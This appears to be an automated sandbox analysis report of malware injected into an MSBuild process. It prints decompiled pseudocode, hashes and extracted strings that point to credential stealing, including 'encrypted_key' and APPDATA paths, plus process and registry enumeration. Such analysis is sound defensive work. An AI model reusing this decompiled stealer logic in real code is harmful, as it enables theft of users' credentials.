                        • Instruction ID: 88353113fceb9506f3b36d61bfde8eef9921c9a466ae1bfd82caa565229af05a
                        • Opcode Fuzzy Hash: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                        • Instruction Fuzzy Hash: A2619CB49087849BD720EF65C18469EFBE0BF89348F408D2EE8D887351E7789548CF5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %$%$%s\%s.%s$TEMP$\$s$s
                        • API String ID: 0-3075679649
                        • Opcode ID: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
                        • Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
                        • Opcode Fuzzy Hash: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
                        • Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 15%
                        			E0040DCE9(signed int __edx, void* _a4) {
                        				intOrPtr* _v52;
                        				char _v488;
                        				char _v492;
                        				char _v684;
                        				char _v908;
                        				char _v1032;
                        				char _v1036;
                        				void _v1068;
                        				void _v1084;
                        				void _v1092;
                        				void _v1096;
                        				void _v1100;
                        				void _v1104;
                        				void _v1108;
                        				char _v1132;
                        				char _v1136;
                        				char _v1148;
                        				char _v1156;
                        				char _v1160;
                        				char _v1164;
                        				char _v1168;
                        				intOrPtr _v1172;
                        				intOrPtr _v1176;
                        				char* _v1180;
                        				signed int _v1188;
                        				intOrPtr* _v1196;
                        				intOrPtr _v1204;
                        				signed int _v1212;
                        				signed int _v1220;
                        				char* _v1224;
                        				void _v1228;
                        				void _v1232;
                        				void _v1236;
                        				signed char _v1240;
                        				void* _v1244;
                        				signed char _v1248;
                        				intOrPtr _v1252;
                        				void _v1256;
                        				void _v1264;
                        				void _v1268;
                        				signed char _v1272;
                        				char* _v1276;
                        				signed char _v1280;
                        				intOrPtr _v1284;
                        				void _v1288;
                        				void _v1296;
                        				char* _v1300;
                        				signed char _v1304;
                        				char* _v1308;
                        				signed char _v1312;
                        				intOrPtr _v1316;
                        				void _v1320;
                        				void _v1324;
                        				void _v1328;
                        				void* _v1332;
                        				void _v1336;
                        				void _v1340;
                        				char _v1344;
                        				char _v1348;
                        				signed char _v1352;
                        				signed char _v1356;
                        				void _v1360;
                        				signed char _v1364;
                        				signed char _v1368;
                        				void _v1372;
                        				signed char _v1376;
                        				void _v1380;
                        				void _v1384;
                        				signed char _v1396;
                        				signed char _v1400;
                        				char* _v1404;
                        				char* _v1408;
                        				char* _v1412;
                        				char _v1416;
                        				char* _t211;
                        				char* _t212;
                        				intOrPtr* _t213;
                        				void* _t214;
                        				intOrPtr* _t215;
                        				char _t216;
                        				void* _t217;
                        				signed int _t218;
                        				void _t224;
                        				void* _t229;
                        				void* _t233;
                        				void* _t250;
                        				char* _t251;
                        				intOrPtr _t257;
                        				void* _t278;
                        				void _t279;
                        				signed char _t285;
                        				void* _t288;
                        				intOrPtr* _t289;
                        				char* _t290;
                        				signed int _t295;
                        				signed int _t296;
                        				signed int _t297;
                        				signed int _t298;
                        				signed char _t299;
                        				void _t301;
                        				signed char _t303;
                        				intOrPtr* _t310;
                        				signed char _t311;
                        				intOrPtr _t312;
                        				signed char _t313;
                        				char* _t316;
                        				void* _t317;
                        				char* _t318;
                        				signed char _t319;
                        				char _t320;
                        				void* _t321;
                        				char** _t324;
                        				void* _t326;
                        				void* _t329;
                        
                        				_t295 = __edx;
                        				_v1108 = 0;
                        				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
                        				_v1104 = 0;
                        				_v1100 = 0;
                        				_v1096 = 0;
                        				_v1092 = 0;
                        				memcpy( &_v1068, 0x4228b0, 4 << 2);
                        				_t324 = _t321 - 0x48c + 0x18;
                        				_t211 = E004081AA("2CQi5Yi4.Sii");
                        				_v1180 = _t211;
                        				L0041F55C();
                        				_t316 = _t211;
                        				_t212 = 0;
                        				_push(_t288);
                        				if(_t316 == 0) {
                        					L38:
                        					return _t212;
                        				}
                        				 *_t324 = "zCQi5TsdRzCQi5";
                        				_t213 = E004081AA();
                        				 *_t324 = _t316;
                        				_v1180 = _t213;
                        				L0041F5AC();
                        				_push(_t295);
                        				_t310 = _t213;
                        				 *_t324 = "zCQi5PiW6dzCQi5";
                        				_t214 = E004081AA(_t295);
                        				 *_t324 = _t316;
                        				_v1188 = _t214;
                        				L0041F5AC();
                        				_push(0);
                        				 *_t324 = "zCQi5jRQld0C5dX5dl6";
                        				_v1148 = _t214;
                        				_t215 = E004081AA(0);
                        				 *_t324 = _t316;
                        				_v1196 = _t215;
                        				L0041F5AC();
                        				_push(_t288);
                        				_t289 = _t215;
                        				 *_t324 = "zCQi5Ed5X5dl";
                        				_t216 = E004081AA(_t288);
                        				 *_t324 = _t316;
                        				_v1204 = _t216;
                        				L0041F5AC();
                        				_push(_t317);
                        				 *_t324 = "zCQi5Ed5X5dl";
                        				_v1160 = _t216;
                        				_t217 = E004081AA(_t317);
                        				 *_t324 = _t316;
                        				_v1212 = _t217;
                        				L0041F5AC();
                        				_push(_t295);
                        				_v1224 = "zCQi5_0dd";
                        				_v1164 = _t217;
                        				_t218 = E004081AA(_t295);
                        				_v1224 = _t316;
                        				_v1220 = _t218;
                        				L0041F5AC();
                        				_push(0);
                        				_push(0);
                        				_t296 = _t295 & 0xffffff00 | _t310 == 0x00000000;
                        				_v1188 = _t218;
                        				_t297 = _t296 & 0xffffff00 | _v1180 == 0x00000000;
                        				_t298 = _t297 & 0xffffff00 | _v1176 == 0x00000000;
                        				_t299 = _t298 & 0xffffff00 | _v1172 == 0x00000000;
                        				if((_t218 & 0xffffff00 | _t289 == 0x00000000 | _t296 | _t297 | _t298 | _t299) != 0 || _v1188 == 0) {
                        					L3:
                        					_t290 = 0;
                        					goto L33;
                        				} else {
                        					_v1228 = 0;
                        					_v1224 =  &_v1156;
                        					_v1232 =  &_v1136;
                        					_t229 =  *_t310();
                        					_t324 = _t324 - 0xc;
                        					if(_t229 != 0) {
                        						goto L3;
                        					}
                        					_v1240 = 0x200;
                        					_v1232 =  &_v1160;
                        					_v1236 =  &_v1164;
                        					_v1244 = _v1168;
                        					_t233 =  *_t289();
                        					_t324 = _t324 - 0x10;
                        					if(_t233 != 0 || _v1180 == 0) {
                        						goto L3;
                        					} else {
                        						if(E004132E6(0, _t299) != 0xa) {
                        							if(E004132E6(0, _t299) == 0xc || E004132E6(0, _t299) == 0xb || E004132E6(0, _t299) == 0xe || E004132E6(0, _t299) == 0xd || E004132E6(0, _t299) == 0xf) {
                        								goto L8;
                        							} else {
                        								_v1212 = 0;
                        								_t290 = 0;
                        								while(_v1212 < _v1180) {
                        									_v1252 = 0x10;
                        									_t299 = _v1212 * 0x34 + _v1176;
                        									_v1256 =  &_v1148;
                        									 *_t324 = _t299;
                        									_t313 = _t299;
                        									if(E004129C0() == 0) {
                        										_v1232 = 0;
                        										_v1236 = 0;
                        										_v1240 = 0x100;
                        										_v1248 = 0xffffffff;
                        										_v1244 =  &_v1132;
                        										_v1256 = 0;
                        										 *_t324 = 0;
                        										_v1252 =  *((intOrPtr*)(_t313 + 0x10));
                        										L0041F4DC();
                        										_t329 = _t324 - 0x20;
                        										_v1264 = 0;
                        										_v1268 = 0;
                        										_v1272 = 0x100;
                        										_v1280 = 0xffffffff;
                        										_v1276 =  &_v908;
                        										_v1288 = 0;
                        										 *_t329 = 0;
                        										_v1284 =  *((intOrPtr*)(_t313 + 0x14)) + 0x20;
                        										L0041F4DC();
                        										_t319 =  &_v684;
                        										_v1296 = 0;
                        										_v1300 = 0;
                        										_v1304 = 0x100;
                        										_v1312 = 0xffffffff;
                        										_v1308 = _t319;
                        										_v1320 = 0;
                        										_v1324 = 0;
                        										_v1316 =  *((intOrPtr*)(_t313 + 0x18)) + 0x20;
                        										L0041F4DC();
                        										_v1336 = 0;
                        										_v1340 = 0;
                        										_v1268 = 0;
                        										_v1332 =  &_v1268;
                        										_v1344 =  *((intOrPtr*)(_t313 + 0x18));
                        										_v1352 = _t313;
                        										_v1348 =  *((intOrPtr*)(_t313 + 0x14));
                        										_v1356 = _v1280;
                        										_t278 = _v1300();
                        										_t324 = _t329 - 0xffffffffffffffe4;
                        										if(_t278 == 0) {
                        											_t303 =  &_v488;
                        											_v1356 = 0;
                        											_v1360 = 0;
                        											_v1364 = 0x100;
                        											_v1368 = _t303;
                        											_v1372 = 0xffffffff;
                        											_v1380 = 0;
                        											_v1384 = 0;
                        											_v1324 = _t303;
                        											_v1376 =  *((intOrPtr*)(_v1296 + 0x1c)) + 0x20;
                        											L0041F4DC();
                        											_t324 = _t324 - 0x20;
                        											_t299 = _v1356;
                        											_v1400 = _t319;
                        											_t320 =  &_v1324;
                        											_v1408 = 2;
                        											_v1412 = 0x4239a1;
                        											_v1404 =  &_v1032;
                        											_v1324 = 0;
                        											_v1396 = _t299;
                        											_v1416 = _t320;
                        											_t285 = E00412755( &_v1032);
                        											_t313 = _t285;
                        											if(_t285 != 0xffffffff) {
                        												_v1404 = _t285;
                        												_v1412 = _t290;
                        												_v1400 = 1;
                        												_v1408 = _t320;
                        												_t290 = _t290 + _t313;
                        												_v1416 =  &_v1344;
                        												_v1344 = E00412ABF(0);
                        											}
                        										}
                        										_t279 = _v1296;
                        										if(_t279 != 0) {
                        											_v1384 = _t279;
                        											_v1340();
                        											_push(_t313);
                        										}
                        									}
                        									_v1336 =  &(1[_v1336]);
                        								}
                        								L33:
                        								_t224 = _v1148;
                        								if(_t224 != 0) {
                        									_v1232 = _t224;
                        									_t224 = _v1188();
                        									_push(0);
                        								}
                        								if(_v1156 != 0) {
                        									_v1232 =  &_v1156;
                        									_t224 = _v1180();
                        									_push(_t299);
                        								}
                        								_v1232 = _t316;
                        								L0041F614();
                        								_push(_t224);
                        								 *_v52 = _t290;
                        								_t212 = _v1164;
                        								goto L38;
                        							}
                        						}
                        						L8:
                        						_v1212 = 0;
                        						_t290 = 0;
                        						while(_v1212 < _v1180) {
                        							_v1252 = 0x10;
                        							_t299 = _v1212 * 0x38 + _v1176;
                        							_v1256 =  &_v1148;
                        							 *_t324 = _t299;
                        							_t311 = _t299;
                        							if(E004129C0() == 0) {
                        								_v1232 = 0;
                        								_v1236 = 0;
                        								_v1240 = 0x100;
                        								_v1248 = 0xffffffff;
                        								_v1244 =  &_v1132;
                        								_v1256 = 0;
                        								 *_t324 = 0;
                        								_v1252 =  *((intOrPtr*)(_t311 + 0x10));
                        								L0041F4DC();
                        								_t326 = _t324 - 0x20;
                        								_v1264 = 0;
                        								_v1268 = 0;
                        								_v1272 = 0x100;
                        								_v1280 = 0xffffffff;
                        								_v1276 =  &_v908;
                        								_v1288 = 0;
                        								 *_t326 = 0;
                        								_v1284 =  *((intOrPtr*)(_t311 + 0x14)) + 0x20;
                        								L0041F4DC();
                        								_t318 =  &_v684;
                        								_v1296 = 0;
                        								_v1300 = 0;
                        								_v1304 = 0x100;
                        								_v1312 = 0xffffffff;
                        								_v1308 = _t318;
                        								_v1320 = 0;
                        								_v1324 = 0;
                        								_v1316 =  *((intOrPtr*)(_t311 + 0x18)) + 0x20;
                        								L0041F4DC();
                        								_v1332 = 0;
                        								_v1336 = 0;
                        								_v1340 = 0;
                        								_v1268 = 0;
                        								_v1328 =  &_v1268;
                        								_v1344 =  *((intOrPtr*)(_t311 + 0x18));
                        								_v1352 = _t311;
                        								_v1348 =  *((intOrPtr*)(_t311 + 0x14));
                        								_v1356 = _v1280;
                        								_t250 = _v1296();
                        								_t324 = _t326 - 0xffffffffffffffe0;
                        								if(_t250 == 0) {
                        									_t301 =  &_v492;
                        									_v1360 = 0;
                        									_v1364 = 0;
                        									_v1368 = 0x100;
                        									_v1372 = _t301;
                        									_v1376 = 0xffffffff;
                        									_v1384 = 0;
                        									 *_t324 = 0;
                        									_v1332 = _t301;
                        									_v1380 = _v1300[0x1c] + 0x20;
                        									L0041F4DC();
                        									_t324 = _t324 - 0x20;
                        									_t299 = _v1364;
                        									_v1404 = _t318;
                        									_t318 =  &_v1328;
                        									_v1412 = 2;
                        									_v1416 = 0x4239a1;
                        									_v1408 =  &_v1036;
                        									_v1328 = 0;
                        									_v1400 = _t299;
                        									 *_t324 = _t318;
                        									_t257 = E00412755( &_v1036);
                        									_t312 = _t257;
                        									if(_t257 != 0xffffffff) {
                        										_v1408 = _t257;
                        										_v1416 = _t290;
                        										_v1404 = 1;
                        										_v1412 = _t318;
                        										_t290 = _t290 + _t312;
                        										 *_t324 =  &_v1348;
                        										_v1348 = E00412ABF(0);
                        									}
                        								}
                        								_t251 = _v1300;
                        								if(_t251 != 0) {
                        									 *_t324 = _t251;
                        									_v1344();
                        									_push(_t318);
                        								}
                        							}
                        							_v1340 =  &(1[_v1340]);
                        						}
                        						goto L33;
                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2CQi5Yi4.Sii$zCQi5Ed5X5dl$zCQi5PiW6dzCQi5$zCQi5TsdRzCQi5$zCQi5_0dd$zCQi5jRQld0C5dX5dl6
                        • API String ID: 0-1136301387
                        • Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                        • Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
                        • Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                        • Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 49%
                        			E0040FE8C(signed int __eax, void* __ecx, void* __edx) {
                        				intOrPtr _v4;
                        				intOrPtr _v56;
                        				char _v560;
                        				char _v1108;
                        				void* _v1364;
                        				char _v1368;
                        				signed int _v1396;
                        				char _v1404;
                        				char _v1432;
                        				char _v1436;
                        				char _v1444;
                        				signed short _v1448;
                        				signed short _v1450;
                        				signed short _v1452;
                        				signed short _v1454;
                        				signed short _v1458;
                        				signed short _v1460;
                        				char _v1464;
                        				char* _v1468;
                        				char _v1476;
                        				intOrPtr _v1480;
                        				char* _v1488;
                        				char* _v1496;
                        				char _v1500;
                        				intOrPtr _v1504;
                        				void* _v1508;
                        				signed int _v1512;
                        				signed int _v1516;
                        				signed int _v1520;
                        				signed int _v1524;
                        				signed int _v1528;
                        				signed int _v1532;
                        				signed int _v1536;
                        				signed int _v1540;
                        				signed int _v1544;
                        				char* _v1548;
                        				intOrPtr _v1552;
                        				char _v1556;
                        				char* _t79;
                        				void* _t82;
                        				intOrPtr* _t84;
                        				signed int _t85;
                        				signed int _t87;
                        				void* _t93;
                        				signed int _t94;
                        				signed int _t102;
                        				void* _t111;
                        				void* _t112;
                        				char* _t116;
                        				void* _t117;
                        				char* _t119;
                        				intOrPtr* _t121;
                        				char* _t123;
                        				char* _t124;
                        				signed int _t127;
                        				intOrPtr* _t128;
                        				void* _t129;
                        
                        				_t118 = __edx;
                        				_t117 = __ecx;
                        				_v1496 = 0;
                        				_v1500 = 2;
                        				L0041F664();
                        				_push(__edx);
                        				_push(__edx);
                        				if(__eax == 0xffffffff) {
                        					L3:
                        					_v1496 = 0;
                        					return E00405D7D(_t118, _v4, 0xbf, 0);
                        				}
                        				_t115 = __eax;
                        				_t79 =  &_v1364;
                        				_v1364 = 0x128;
                        				_v1508 = __eax;
                        				_v1504 = _t79;
                        				L0041F52C();
                        				_push(_t126);
                        				if(_t79 != 0) {
                        					E0041236C( &_v1432,  &_v1432, 0x8000);
                        					_t82 = E004081AA("Ed5FWSQid_4idLCldjfD");
                        					_t84 = E00407F8E(_t118, E00407F7A(_t118, "psapi.dll"), _t82);
                        					_t121 = _t84;
                        					if(_t84 == 0) {
                        						_t112 = E004081AA("Ed5FWSQid_4idLCldjfD");
                        						_t121 = E00407F8E(_t118, E00407F7A(_t118, "kernel32.dll"), _t112);
                        					}
                        					_t127 =  &_v560;
                        					do {
                        						_t85 = _v1364;
                        						_v1512 = 0;
                        						_v1516 = 0x410;
                        						_v1508 = _t85;
                        						L0041F53C();
                        						_t129 = _t128 - 0xc;
                        						_t123 = _t85;
                        						if(_t85 == 0 || _t121 == 0) {
                        							L10:
                        							E00412548(_t127, 0x424374, 0x204);
                        							goto L11;
                        						} else {
                        							_v1516 = 0x204;
                        							_v1520 = _t127;
                        							_v1524 = 0;
                        							_v1528 = _t85;
                        							_t111 =  *_t121();
                        							_t129 = _t129 - 0x10;
                        							if(_t111 != 0) {
                        								L11:
                        								_t87 =  &_v1452;
                        								_t119 =  &_v1460;
                        								_v1528 = _t123;
                        								_v1512 = _t87;
                        								_v1516 = _t87;
                        								_v1520 = _t87;
                        								_v1524 = _t119;
                        								_v1468 = _t119;
                        								L0041F5A4();
                        								_t128 = _t129 - 0x14;
                        								if(_t87 == 0) {
                        									L23:
                        									E00412548( &_v1436, 0x424374, 0x20);
                        									goto L14;
                        								}
                        								_t119 = _v1488;
                        								if(_v1480 == 0) {
                        									goto L23;
                        								}
                        								_t102 =  &_v1452;
                        								_v1548 = _t119;
                        								_v1544 = _t102;
                        								L0041F644();
                        								_push(_t102);
                        								_push(_t102);
                        								_v1548 = "%.2d/%.2d/%d %.2d:%.2d:%.2d";
                        								_v1552 = 0x20;
                        								_v1524 = _v1448 & 0x0000ffff;
                        								_v1528 = _v1450 & 0x0000ffff;
                        								_v1532 = _v1452 & 0x0000ffff;
                        								_v1536 = _v1460 & 0x0000ffff;
                        								_v1540 = _v1458 & 0x0000ffff;
                        								_v1544 = _v1454 & 0x0000ffff;
                        								_v1556 =  &_v1444;
                        								E004127A8();
                        								goto L14;
                        							}
                        							goto L10;
                        						}
                        						L14:
                        						if(_t123 != 0) {
                        							_v1548 = _t123;
                        							L0041F694();
                        							_push(_t123);
                        						}
                        						_t124 =  &_v1108;
                        						_v1528 = _t127;
                        						_v1540 = 0x424376;
                        						_v1544 = 0x204;
                        						_v1524 =  &_v1436;
                        						_v1548 = _t124;
                        						_v1532 = _v1396;
                        						_v1536 =  &_v1368;
                        						_t93 = E004127A8();
                        						if(_t93 > 0) {
                        							E00412458( &_v1464, _t119,  &_v1464, _t124, _t93);
                        						}
                        						_t94 =  &_v1404;
                        						_v1548 = _t115;
                        						_v1544 = _t94;
                        						L0041F524();
                        						_push(_t117);
                        						_push(_t117);
                        					} while (_t94 != 0);
                        					_v1556 = _t115;
                        					L0041F694();
                        					_push(_t119);
                        					_t116 =  &_v1476;
                        					if(_v1468 == 0) {
                        						_v1548 = 0;
                        						_v1552 = 0;
                        						_v1556 = 0xbf;
                        					} else {
                        						 *_t128 = _t116;
                        						_v1548 = E00412540();
                        						_v1556 = 0xbe;
                        						_v1552 = _v1476;
                        					}
                        					 *_t128 = _v56;
                        					E00405D7D(_t119);
                        					 *_t128 = _t116;
                        					return E004123B1();
                        				}
                        				_v1516 = __eax;
                        				L0041F694();
                        				goto L3;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $ $%.2d/%.2d/%d %.2d:%.2d:%.2d$Ed5FWSQid_4idLCldjfD$kernel32.dll$psapi.dll
                        • API String ID: 0-116260847
                        • Opcode ID: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                        • Instruction ID: 6fadafcb3b73e839ba5121377a1d1d4624def229cb7cc3727062cbee2f3d546e
                        • Opcode Fuzzy Hash: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                        • Instruction Fuzzy Hash: BB81C3B0408741AED720AF25C54566FBBE4AF85748F018D2EF8D887351E7BDC989CB46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @$MT_qUDrj\FWk4iiC\%6\$MT_qUDrj\FWk4iiC\%6\%6\FC4R$PQ00dR5zd064WR$XR65Cii a40dY5W0Z$x64
                        • API String ID: 0-4110341741
                        • Opcode ID: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                        • Instruction ID: 72ec6481281fc5666a7dbf46cbeff2a2701b551c42623141a7dd164dfcf0ae83
                        • Opcode Fuzzy Hash: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                        • Instruction Fuzzy Hash: E221E0B0508301AED300AF26D54925EFBF4EF88308F418D2EE8D897241D7BD9685CB8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !$0x%02hhX$0x05$0x0D$encrypted_key
                        • API String ID: 0-939079894
                        • Opcode ID: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                        • Instruction ID: 786053efb03fb7134250340436023ef553204ed8f41ee6c066ba5e47f52fe47d
                        • Opcode Fuzzy Hash: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                        • Instruction Fuzzy Hash: FEC1EAB1A053198FDB50DF25C844B9EBBF0BF45308F0588AEE489E7681D7789A84CF46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $($($6$BM
                        • API String ID: 0-2637400849
                        • Opcode ID: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                        • Instruction ID: c42d9fa6f562a18c3eedbb1c72d559f421865ac330c7369b2ec7bacda9b62638
                        • Opcode Fuzzy Hash: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                        • Instruction Fuzzy Hash: 4781BDB05093409FD310EF6AD68475BBBE4AF88744F40892EF58887351E7B9D8888B5B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $../nettle-3.5.1/ctr16.c$c$length - i < CTR_BUFFER_LIMIT$length < 16
                        • API String ID: 0-535899598
                        • Opcode ID: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                        • Instruction ID: 595662ab794f8c563696035dacf2dbdab12226766188b8df76e1304a900497cc
                        • Opcode Fuzzy Hash: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                        • Instruction Fuzzy Hash: 1E71DDB5A083199FDB00EF69D48859EBBE0EF88354F01C92EF89997351C3389854CF96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %6\.sQ0sid\CYYWQR56.fli$<RCld>$<s0W5WYWi>$<sC66gW0S>$APPDATA
                        • API String ID: 0-1218082621
                        • Opcode ID: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                        • Instruction ID: 6048a10f2db6f6121dbf09b1e91f7eeb88fe885a8aaa66a3f769cde923567c5e
                        • Opcode Fuzzy Hash: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                        • Instruction Fuzzy Hash: EC41D8B0408311DAD310AF25D58526EBAF4BF84758F50CA2FE4D897381D77C8585DB5B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $DiiWYC5dDRSXR454Ci4kdM4S$PIdYwqWwdRFdlVd06I4s$_0ddM4S$advapi32.dll
                        • API String ID: 0-1236196231
                        • Opcode ID: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                        • Instruction ID: 116aa698c271bca6352efc5b2b04a0db36bd32a1f1fa5c071599b3e3fb9e0c6d
                        • Opcode Fuzzy Hash: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                        • Instruction Fuzzy Hash: FC31D7B0509351ABD740AF65D59831FBAE0AF84348F41982EF5C49B381D7BDC5848B87
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E00410FC4(void* __ecx, signed int _a4, signed int _a8, signed int _a12, void* _a16, intOrPtr _a32) {
                        				signed int _v0;
                        				signed int _v24;
                        				intOrPtr _v32;
                        				signed int _v44;
                        				char _v544;
                        				char _v548;
                        				char _v556;
                        				char _v568;
                        				char _v572;
                        				signed int _v576;
                        				void* _v580;
                        				signed int _v584;
                        				signed int _v588;
                        				signed int _v592;
                        				signed int _v596;
                        				signed int _v600;
                        				signed int _v604;
                        				signed int _v608;
                        				signed int _v612;
                        				signed int _v616;
                        				signed int _v620;
                        				signed int _v624;
                        				signed int _v628;
                        				char* _v632;
                        				char _v636;
                        				char _v640;
                        				intOrPtr _v644;
                        				signed int _v648;
                        				signed int* _v652;
                        				signed int _v656;
                        				signed int _v660;
                        				intOrPtr _v664;
                        				signed int _v668;
                        				intOrPtr _v692;
                        				signed int _t122;
                        				signed int _t129;
                        				signed int _t133;
                        				signed int _t134;
                        				void* _t136;
                        				void* _t137;
                        
                        				_t137 = _t136 - 0x24c;
                        				_t134 = _a8;
                        				_t133 = _a12;
                        				_t122 = _a32 - 1;
                        				if(_t122 > 5) {
                        					L28:
                        					_t129 = 0;
                        					L29:
                        					return _t129;
                        				}
                        				switch( *((intOrPtr*)(_t122 * 4 +  &M0042444C))) {
                        					case 0:
                        						_v580 = 0;
                        						_v584 = 0xf003f;
                        						_v588 = 0;
                        						_v592 = 0;
                        						_v572 =  &_v548;
                        						_t125 =  &_v556;
                        						_v596 = 0;
                        						_v600 = _t133;
                        						_v604 = _t134;
                        						_v576 = _t125;
                        						L0041F454();
                        						_t137 = _t137 - 0x24;
                        						if(_t125 != 0) {
                        							goto L28;
                        						}
                        						_v620 = _t133;
                        						_v624 = _t134;
                        						_v628 = 1;
                        						goto L7;
                        					case 1:
                        						__eax =  &_v556;
                        						_v592 = 0x2001f;
                        						_v596 = 0;
                        						_v600 = __edi;
                        						_v604 = __esi;
                        						_v588 = __eax;
                        						L0041F42C();
                        						__esp = __esp - 0x14;
                        						if(__eax != 0) {
                        							goto L28;
                        						}
                        						__eax = _a8;
                        						_v616 = 0;
                        						_v620 = __ebp;
                        						_v604 = _a8;
                        						__eax = _a4;
                        						_v608 = _a4;
                        						__eax = _v0;
                        						_v612 = _v0;
                        						__eax = _v576;
                        						_v624 = __eax;
                        						L0041F41C();
                        						__esp = __esp - 0x18;
                        						__ebx = __eax;
                        						__eax = _v600;
                        						_v648 = __eax;
                        						L0041F45C();
                        						_push(__eax);
                        						if(__ebx != 0) {
                        							goto L28;
                        						}
                        						_v632 = __edi;
                        						_v636 = __esi;
                        						_v640 = 2;
                        						L7:
                        						_t130 =  &_v580;
                        						_v632 = "%c%.8x%s";
                        						_v636 = 0x204;
                        						_v640 =  &_v580;
                        						_t126 = E004127A8();
                        						goto L14;
                        					case 2:
                        						__eax = E0041086B(__ecx, __esi, __edi, __ebp);
                        						__bl = __al;
                        						if(__al == 0) {
                        							goto L28;
                        						}
                        						_v588 = __esi;
                        						__esi =  &_v544;
                        						_v580 = __ebp;
                        						_v584 = __edi;
                        						__eax = E004127A8( &_v544, 0x204, "%c%.8x%s%s", 3);
                        						if(__eax == 0) {
                        							goto L16;
                        						}
                        						goto L27;
                        					case 3:
                        						__eax =  &_v556;
                        						_v592 = 0x2001f;
